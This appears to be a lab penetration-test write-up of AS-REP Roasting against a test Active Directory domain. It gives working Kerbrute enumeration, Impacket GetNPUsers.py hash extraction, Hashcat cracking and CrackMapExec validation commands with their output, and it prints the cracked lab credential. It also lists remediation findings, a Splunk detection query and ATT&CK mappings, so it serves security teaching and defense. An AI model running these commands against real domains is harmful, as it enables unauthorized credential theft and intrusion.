Unauthenticated user enumeration, AS-REP hash extraction from a pre-auth disabled account, offline password cracking in under 2 minutes — valid domain credentials obtained without ever authenticating to the domain.
| Field | Detail |
|---|---|
| Target | Internal Active Directory Network — domain: ad.lab |
| Objective | Gain valid domain credentials without authentication |
| Attack Vector | AS-REP Roasting + offline password cracking |
| Difficulty | Medium |
| Starting Position | Unauthenticated network access only |
| Tools | Kerbrute, Impacket GetNPUsers.py, Hashcat, CrackMapExec |
Starting with nothing but network access to the domain, user enumeration via Kerbrute identified five valid domain accounts including asrep.user — an account with Kerberos pre-authentication disabled. The AS-REP hash was extracted without supplying any credentials. Hashcat cracked the hash in 1 minute 46 seconds using rockyou.txt. Valid domain credentials obtained: asrep.user:ASREPRoast1!.
Kerbrute sends AS-REQ packets to the domain controller and identifies valid usernames based on Kerberos error responses — without ever authenticating. Invalid usernames return KDC_ERR_C_PRINCIPAL_UNKNOWN; valid usernames return a different response code, confirming existence.
kerbrute userenum --dc 10.80.80.2 -d ad.lab /usr/share/wordlists/usernames.txt
[*] Valid user => john.smith
[*] Valid user => asrep.user
[*] Valid user => svc_sql
[*] Valid user => svc_backup
[*] Valid user => adminAS-REP Roasting exploits accounts that have Kerberos pre-authentication disabled. Normally, a client must prove knowledge of its password before the KDC issues an AS-REP ticket. With pre-auth disabled, the KDC will issue a ticket to anyone — the ticket is encrypted with the user's password hash, which can be extracted and cracked offline.
# Extract AS-REP hashes — no credentials required
GetNPUsers.py ad.lab/ -usersfile valid_users.txt -dc-ip 10.80.80.2 -no-pass -format hashcat
$krb5asrep$23$asrep.user@AD.LAB:a1b2c3d4e5f6...The returned hash is in Hashcat mode 18200 format ($krb5asrep$23$) — ready for offline cracking.
hashcat -m 18200 asrep.hash /usr/share/wordlists/rockyou.txt --force
$krb5asrep$23$asrep.user@AD.LAB:[hash]:ASREPRoast1!
Session..........: hashcat
Status...........: Cracked
Time.Estimated...: 0 secs (1 min, 46 secs elapsed)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)Credentials obtained: asrep.user:ASREPRoast1!
# Validate credentials
crackmapexec smb 10.80.80.2 -u asrep.user -p ASREPRoast1!
SMB 10.80.80.2 445 DC01 [+] AD.LAB\asrep.user:ASREPRoast1!With valid domain credentials, escalation paths now available include: Kerberoasting service accounts, AD enumeration with BloodHound, lateral movement, and credential spraying against other accounts.
| Attribute | AS-REP Roasting | Kerberoasting |
|---|---|---|
| Authentication required | No — unauthenticated | Yes — valid domain credentials required |
| Target accounts | Pre-authentication disabled accounts | Accounts with registered SPNs |
| Hash type | AS-REP ($krb5asrep$23$ — mode 18200) | TGS ($krb5tgs$23$ — mode 13100) |
| Privilege required | None — network access only | Standard domain user |
| Detection artifacts | Event ID 4768 (without pre-auth) | Event ID 4769 (service ticket requests) |
| Prevalence | Lower (configuration error) | Higher (service accounts are common) |
| # | Finding | Severity | Recommendation |
|---|---|---|---|
| 1 | Kerberos pre-authentication disabled on asrep.user | Critical | Enable Kerberos pre-authentication on all accounts — disable only with explicit documented justification |
| 2 | Weak password cracked in under 2 minutes | High | Enforce 16+ character passwords for all domain accounts; implement LAPS for service accounts |
| 3 | No monitoring of AS-REQ without pre-auth | High | Alert on Event ID 4768 with pre-authentication not required; alert on high-volume AS-REP requests |
| 4 | Domain usernames enumerable without credentials | Medium | Implement user enumeration controls; monitor for Kerbrute-style username spraying patterns |
# Splunk — Detect AS-REP Roasting (Event ID 4768 without pre-auth)
index=security EventCode=4768
PreAuthType=0
| stats count by TargetUserName, IpAddress
| where count > 5
| sort -count| Technique ID | Technique |
|---|---|
| T1595 | Active Scanning — username enumeration via Kerbrute |
| T1558.004 | AS-REP Roasting — hash extraction from pre-auth disabled accounts |
| T1110.002 | Password Cracking — offline hash cracking with Hashcat |
| T1087.002 | Domain Account Discovery — valid username enumeration |
| T1078 | Valid Accounts — obtained working domain credentials |